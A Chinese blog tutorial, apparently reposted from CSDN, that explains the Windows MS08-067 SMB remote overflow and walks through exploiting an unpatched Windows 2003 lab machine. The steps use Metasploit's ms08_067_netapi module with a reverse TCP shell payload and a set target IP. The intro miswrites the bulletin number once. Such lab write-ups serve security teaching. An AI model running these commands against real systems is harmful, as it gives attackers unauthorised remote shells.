天天看點

「網絡攻防」網絡安全基礎之Windows漏洞複現 (MS08-067)

前言

本次介紹Windows系統漏洞 MS08-087

一、MS08-067 介紹

Windows Server服務 RPC 緩沖區遠端溢出漏洞

編号 MS08-067

二、漏洞複現

1.漏洞原理

MS08_067漏洞滲透攻擊原理

其原理就是攻擊者利用受害者預設開啟的SMB服務端口445端口發送惡意的資料到這個端口,通過MSRPC接口調用Server服務的函數,并破壞程式的棧緩沖區,利用遠端代碼執行權限,進而控制主機

2.漏洞複現

前期準備: 靶機:Windows 2003 (未打更新檔)

攻擊機:kali Linux

MS08_067漏洞滲透攻擊過程

使用Metasploit中對應的子產品進行滲透攻擊。

啟動Metasploit,進入之後搜尋對于漏洞子產品

Search ms08-067

「網絡攻防」網絡安全基礎之Windows漏洞複現 (MS08-067)

搜尋到ms08-067 對于的漏洞子產品,滲透子產品又四部分組成 分别代表子產品類型 目标平台 目标服務 子產品名稱 組成

2. 使用這個子產品

Use exploit/windows/smb/ms08_067_netapi

「網絡攻防」網絡安全基礎之Windows漏洞複現 (MS08-067)

3.檢視所需條件

Show options

「網絡攻防」網絡安全基礎之Windows漏洞複現 (MS08-067)

需要設定靶機的ip位址 攻擊載荷 靶機的系統平台版本

4. 設定攻擊載荷

攻擊載荷就是payload 就是常見的shelllode

首先查找payload

Show payload

「網絡攻防」網絡安全基礎之Windows漏洞複現 (MS08-067)

找到所需的payload

generic/shell_reverse_tcp

使用這個payload

Set payload generic/shell_reverse_tcp

「網絡攻防」網絡安全基礎之Windows漏洞複現 (MS08-067)

5. 設定靶機的主機版本

Show targets

「網絡攻防」網絡安全基礎之Windows漏洞複現 (MS08-067)

在前期對靶機的探測當中獲得的主機版本消息,找到合适的版本資訊

「網絡攻防」網絡安全基礎之Windows漏洞複現 (MS08-067)

Automatic Targeting 選擇這個系統會自動選擇合适的版本攻擊

6.設定IP位址等資訊

Set rhost 10.10.10.130

「網絡攻防」網絡安全基礎之Windows漏洞複現 (MS08-067)

7.運作

Run

8.得到shell

輸入shell 進入shell互動式

總結

今天介紹了 Windows經典漏洞 MS08-067 漏洞攻擊原理和複現過程

————————————————

版權聲明:本文為CSDN部落客「愛學網安的萌新」的原創文章,遵循CC 4.0 BY-SA版權協定,轉載請附上原文出處連結及本聲明。

原文連結:https://blog.csdn.net/weixin_60888404/article/details/125112307

繼續閱讀